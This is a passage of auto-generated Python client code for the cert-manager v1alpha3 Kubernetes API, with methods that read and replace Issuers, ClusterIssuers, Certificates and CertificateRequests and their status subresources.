read status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_status(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Issuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.read_namespaced_issuer_status_with_http_info(name, namespace, **kwargs) # noqa: E501
def read_namespaced_issuer_status_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""read_namespaced_issuer_status # noqa: E501
read status of the specified Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.read_namespaced_issuer_status_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Issuer (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Issuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'resource_version'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method read_namespaced_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `read_namespaced_issuer_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `read_namespaced_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers/{name}/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Issuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_cluster_issuer(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer # noqa: E501
replace the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_cluster_issuer_with_http_info(name, body, **kwargs) # noqa: E501
def replace_cluster_issuer_with_http_info(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer # noqa: E501
replace the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_cluster_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_cluster_issuer`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_cluster_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_cluster_issuer_status(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer_status # noqa: E501
replace status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_status(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3ClusterIssuer
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_cluster_issuer_status_with_http_info(name, body, **kwargs) # noqa: E501
def replace_cluster_issuer_status_with_http_info(self, name, body, **kwargs): # noqa: E501
"""replace_cluster_issuer_status # noqa: E501
replace status of the specified ClusterIssuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_cluster_issuer_status_with_http_info(name, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the ClusterIssuer (required)
:param IoCertManagerV1alpha3ClusterIssuer body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3ClusterIssuer, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_cluster_issuer_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_cluster_issuer_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_cluster_issuer_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/clusterissuers/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3ClusterIssuer', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate # noqa: E501
replace the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3Certificate
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate # noqa: E501
replace the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3Certificate body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3Certificate, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3Certificate', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_request(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request # noqa: E501
replace the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_request_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_request_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request # noqa: E501
replace the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_request`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_request_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request_status # noqa: E501
replace status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_status(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: IoCertManagerV1alpha3CertificateRequest
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.replace_namespaced_certificate_request_status_with_http_info(name, namespace, body, **kwargs) # noqa: E501
def replace_namespaced_certificate_request_status_with_http_info(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_request_status # noqa: E501
replace status of the specified CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.replace_namespaced_certificate_request_status_with_http_info(name, namespace, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the CertificateRequest (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param IoCertManagerV1alpha3CertificateRequest body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param str field_manager: fieldManager is a name associated with the actor or entity that is making these changes. The value must be less than or 128 characters long, and only contain printable characters, as defined by https://golang.org/pkg/unicode/#IsPrint.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(IoCertManagerV1alpha3CertificateRequest, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'body',
'pretty',
'dry_run',
'field_manager'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_namespaced_certificate_request_status" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `replace_namespaced_certificate_request_status`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'field_manager' in local_var_params and local_var_params['field_manager'] is not None: # noqa: E501
query_params.append(('fieldManager', local_var_params['field_manager'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests/{name}/status', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoCertManagerV1alpha3CertificateRequest', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def replace_namespaced_certificate_status(self, name, namespace, body, **kwargs): # noqa: E501
"""replace_namespaced_certificate_status # noqa: E501
replace status of the specified Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
